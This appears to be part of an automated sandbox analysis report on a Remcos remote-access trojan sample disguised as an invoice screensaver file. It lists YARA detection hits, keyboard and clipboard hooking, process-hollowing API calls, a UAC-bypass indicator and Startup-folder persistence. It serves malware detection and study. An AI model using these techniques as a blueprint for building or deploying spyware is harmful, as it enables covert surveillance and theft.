                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000011_2_004099E4
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0040AE1E OpenClipboard,GetClipboardData,CloseClipboard,11_2_0040AE1E
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040987A
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_00406DFC
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_00406E9F
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004068B5
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,17_2_004072B5
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0040AE1E OpenClipboard,GetClipboardData,CloseClipboard,11_2_0040AE1E
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,11_2_00409B10
                  Source: Yara matchFile source: 0.2.FAT6789098700900.scr.exe.3af7610.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.FAT6789098700900.scr.exe.900000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FAT6789098700900.scr.exe.3b6fa40.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.1914432587.0000000000957000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4129439610.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4129439610.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4129439610.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: FAT6789098700900.scr.exe PID: 7492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: FAT6789098700900.scr.exe PID: 7652, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 0.2.FAT6789098700900.scr.exe.3af7610.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.FAT6789098700900.scr.exe.900000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FAT6789098700900.scr.exe.3b6fa40.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.4123803181.0000000000466000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4126585054.000000000307F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4129439610.0000000003BC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4125168442.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1914432587.0000000000957000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4129439610.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4125168442.000000000151A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4125168442.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4129439610.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: FAT6789098700900.scr.exe PID: 7492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: FAT6789098700900.scr.exe PID: 7652, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: .exe PID: 7292, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0041BB71 SystemParametersInfoW,11_2_0041BB71
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0041BB77 SystemParametersInfoW,11_2_0041BB77

                  System Summary

                  barindex
                  Source: 8.2..exe.3a0fa40.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.FAT6789098700900.scr.exe.3af7610.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.FAT6789098700900.scr.exe.3af7610.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0.2.FAT6789098700900.scr.exe.3af7610.4.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 3.2.FAT6789098700900.scr.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 3.2.FAT6789098700900.scr.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 3.2.FAT6789098700900.scr.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0.2.FAT6789098700900.scr.exe.3b6fa40.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0.2.FAT6789098700900.scr.exe.3b6fa40.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000008.00000002.4129081152.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000003.00000002.1914432587.0000000000957000.00000002.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000000.00000002.4129439610.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000000.00000002.4129439610.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000B.00000002.4123803181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: FAT6789098700900.scr.exe PID: 7492, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: FAT6789098700900.scr.exe PID: 7652, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: .exe PID: 8104, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: .exe PID: 7292, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00417245 CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,11_2_00417245
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0041CA9E NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,11_2_0041CA9E
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,11_2_0041ACC1
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,11_2_0041ACED
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_00401806 NtdllDefWindowProc_W,13_2_00401806
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_004018C0 NtdllDefWindowProc_W,13_2_004018C0
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_004016FD NtdllDefWindowProc_A,16_2_004016FD
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_004017B7 NtdllDefWindowProc_A,16_2_004017B7
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_00402CAC NtdllDefWindowProc_A,17_2_00402CAC
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_00402D66 NtdllDefWindowProc_A,17_2_00402D66
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_004158B5 ExitWindowsEx,LoadLibraryA,GetProcAddress,11_2_004158B5
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeCode function: 0_2_026BDA6C0_2_026BDA6C
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeCode function: 0_2_053EE5D90_2_053EE5D9
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeCode function: 0_2_053E2C000_2_053E2C00
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeCode function: 0_2_053E17100_2_053E1710
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 8_2_00DBDA6C8_2_00DBDA6C
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 8_2_071D17108_2_071D1710
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 8_2_071DE5998_2_071DE599
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 8_2_071D2C0F8_2_071D2C0F
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_1001719411_2_10017194
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_1000B5C111_2_1000B5C1
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_004520D211_2_004520D2
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0043D09811_2_0043D098
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0043C9DD11_2_0043C9DD
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_004361AA11_2_004361AA
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00432A4911_2_00432A49
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00436A8D11_2_00436A8D
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0043CC0C11_2_0043CC0C
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00436D4811_2_00436D48
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0043651C11_2_0043651C
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00434D2211_2_00434D22
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00440E2011_2_00440E20
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0043CE3B11_2_0043CE3B
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_004367C611_2_004367C6
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0041D07111_2_0041D071
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0044B04013_2_0044B040
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0043610D13_2_0043610D
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0044731013_2_00447310
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0044A49013_2_0044A490
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0040755A13_2_0040755A
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0043C56013_2_0043C560
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0044B61013_2_0044B610
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0044D6C013_2_0044D6C0
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_004476F013_2_004476F0
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0044B87013_2_0044B870
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0044081D13_2_0044081D
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0041495713_2_00414957
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_004079EE13_2_004079EE
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_00407AEB13_2_00407AEB
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0044AA8013_2_0044AA80
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_00412AA913_2_00412AA9
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_00404B7413_2_00404B74
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_00404B0313_2_00404B03
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0044BBD813_2_0044BBD8
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_00404BE513_2_00404BE5
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_00404C7613_2_00404C76
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_00415CFE13_2_00415CFE
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_00416D7213_2_00416D72
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_00446D3013_2_00446D30
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_00446D8B13_2_00446D8B
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_00406E8F13_2_00406E8F
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_0040503816_2_00405038
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_0041208C16_2_0041208C
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_004050A916_2_004050A9
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_0040511A16_2_0040511A
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_0043C13A16_2_0043C13A
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_004051AB16_2_004051AB
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_0044930016_2_00449300
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_0040D32216_2_0040D322
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_0044A4F016_2_0044A4F0
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_0043A5AB16_2_0043A5AB
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_0041363116_2_00413631
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_0044669016_2_00446690
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_0044A73016_2_0044A730
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_004398D816_2_004398D8
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_004498E016_2_004498E0
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_0044A88616_2_0044A886
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_0043DA0916_2_0043DA09
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_00438D5E16_2_00438D5E
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_00449ED016_2_00449ED0
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_0041FE8316_2_0041FE83
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_00430F5416_2_00430F54
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_004050C217_2_004050C2
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_004014AB17_2_004014AB
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_0040513317_2_00405133
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_004051A417_2_004051A4
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_0040124617_2_00401246
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_0040CA4617_2_0040CA46
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_0040523517_2_00405235
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_004032C817_2_004032C8
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_0040168917_2_00401689
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_00402F6017_2_00402F60
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: String function: 004169A7 appears 87 times
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: String function: 004020E7 appears 40 times
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: String function: 0044DB70 appears 41 times
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: String function: 004165FF appears 35 times
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: String function: 00422297 appears 42 times
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: String function: 00444B5A appears 37 times
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: String function: 00413025 appears 79 times
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: String function: 00416760 appears 69 times
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: String function: 00433FB0 appears 55 times
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 512
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4127461321.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs FAT6789098700900.scr.exe
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4124126006.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs FAT6789098700900.scr.exe
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4137950825.0000000005190000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs FAT6789098700900.scr.exe
                  Source: FAT6789098700900.scr.exe, 00000000.00000000.1659113686.0000000000482000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameForSure.exe0 vs FAT6789098700900.scr.exe
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4127461321.00000000028EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs FAT6789098700900.scr.exe
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4129439610.0000000003A06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs FAT6789098700900.scr.exe
                  Source: FAT6789098700900.scr.exeBinary or memory string: OriginalFilenameForSure.exe0 vs FAT6789098700900.scr.exe
                  Source: FAT6789098700900.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 8.2..exe.3a0fa40.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.FAT6789098700900.scr.exe.3af7610.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.FAT6789098700900.scr.exe.3af7610.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0.2.FAT6789098700900.scr.exe.3af7610.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 3.2.FAT6789098700900.scr.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 3.2.FAT6789098700900.scr.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
